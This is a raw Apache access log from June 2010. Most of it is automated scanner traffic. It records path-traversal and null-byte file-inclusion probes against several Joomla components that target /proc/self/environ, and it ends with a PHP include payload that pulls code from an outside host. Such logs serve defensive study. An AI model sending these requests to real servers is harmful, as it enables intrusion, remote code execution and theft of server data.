59.126.201.241 - - [12/Jun/2010:21:21:45 -0500] "GET /logs/access_log.1219276800 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
59.126.201.241 - - [12/Jun/2010:21:21:47 -0500] "GET /logs/access_log.1219795200 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
213.179.32.13 - - [12/Jun/2010:21:22:10 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.829"
213.179.32.13 - - [12/Jun/2010:21:22:11 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.829"
213.179.32.13 - - [12/Jun/2010:21:22:38 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.829"
207.46.199.39 - - [12/Jun/2010:21:23:36 -0500] "GET /logs/access_log.1171065600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.59.156.163 - - [12/Jun/2010:21:24:25 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:24:25 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:24:25 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:24:25 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:24:25 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:24:25 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:24:36 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:24:36 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:24:37 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:24:37 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:25:32 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:25:33 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:25:33 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:25:33 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:25:39 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.179.32.13 - - [12/Jun/2010:21:26:04 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.829"
213.179.32.13 - - [12/Jun/2010:21:26:04 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.829"
213.179.32.13 - - [12/Jun/2010:21:26:04 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.829"
213.179.32.13 - - [12/Jun/2010:21:26:06 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.829"
67.59.156.163 - - [12/Jun/2010:21:27:04 -0500] "GET /logs/access_log.1274572800/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:04 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:04 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:11 -0500] "GET /logs/access_log.1274572800/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:11 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:11 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:13 -0500] "GET /logs/access_log.1274572800/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:13 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:13 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:19 -0500] "GET /logs/access_log.1274572800/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:19 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:19 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:19 -0500] "GET /logs/access_log.1274572800/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:19 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:27:19 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.54.88.38 - - [12/Jun/2010:21:29:02 -0500] "GET /logs/cowedit.php?ToDo=InsertFunction&DEP=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2010:21:29:02 -0500] "GET /cowedit.php?ToDo=InsertFunction&DEP=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
67.195.112.180 - - [12/Jun/2010:21:29:42 -0500] "GET /logs/access_log.1271721600 HTTP/1.0" 200 586690 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.54.88.38 - - [12/Jun/2010:21:29:47 -0500] "GET /logs/cowedit.php?ToDo=InsertFunction&DEP=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2010:21:29:47 -0500] "GET /cowedit.php?ToDo=InsertFunction&DEP=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2010:21:30:08 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2010:21:30:09 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2010:21:30:09 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
188.165.68.4 - - [12/Jun/2010:21:30:12 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
188.165.68.4 - - [12/Jun/2010:21:30:13 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
194.54.88.38 - - [12/Jun/2010:21:30:35 -0500] "GET /cowedit.php?ToDo=InsertFunction&DEP=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
67.59.156.163 - - [12/Jun/2010:21:30:50 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:30:50 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.61.10.131 - - [12/Jun/2010:21:31:02 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.61.10.131 - - [12/Jun/2010:21:31:02 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:31:03 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
64.57.240.235 - - [12/Jun/2010:21:31:03 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.57.240.235 - - [12/Jun/2010:21:31:04 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.97.233.20 - - [12/Jun/2010:21:31:04 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
216.97.233.20 - - [12/Jun/2010:21:31:04 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
67.59.156.163 - - [12/Jun/2010:21:31:05 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:31:05 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
75.125.143.154 - - [12/Jun/2010:21:31:05 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.125.143.154 - - [12/Jun/2010:21:31:06 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.59.156.163 - - [12/Jun/2010:21:31:08 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:31:08 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:31:09 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:31:09 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:31:10 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
219.240.36.36 - - [12/Jun/2010:21:31:10 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.59.156.163 - - [12/Jun/2010:21:31:16 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:31:16 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.195.235 - - [12/Jun/2010:21:31:37 -0500] "GET /logs/access_log.1186790400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.59.156.163 - - [12/Jun/2010:21:32:01 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:01 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:01 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:19 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:19 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:19 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:19 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:19 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:19 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:21 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:21 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:21 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:36 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:36 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:36 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:37 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:40 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:40 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:41 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:41 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:41 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:44 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:44 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:32:45 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
219.240.36.36 - - [12/Jun/2010:21:34:23 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [12/Jun/2010:21:34:23 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [12/Jun/2010:21:34:24 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.59.156.163 - - [12/Jun/2010:21:34:50 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:34:50 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:35:01 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:35:02 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:35:08 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:35:08 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
219.240.36.36 - - [12/Jun/2010:21:35:17 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
219.240.36.36 - - [12/Jun/2010:21:35:19 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.59.156.163 - - [12/Jun/2010:21:35:38 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:35:38 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:36:06 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:36:06 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:21:36:06 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
72.52.150.147 - - [12/Jun/2010:21:36:09 -0500] "GET /logs/access_log.1223683200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 324 "-""libwww-perl/5.831"
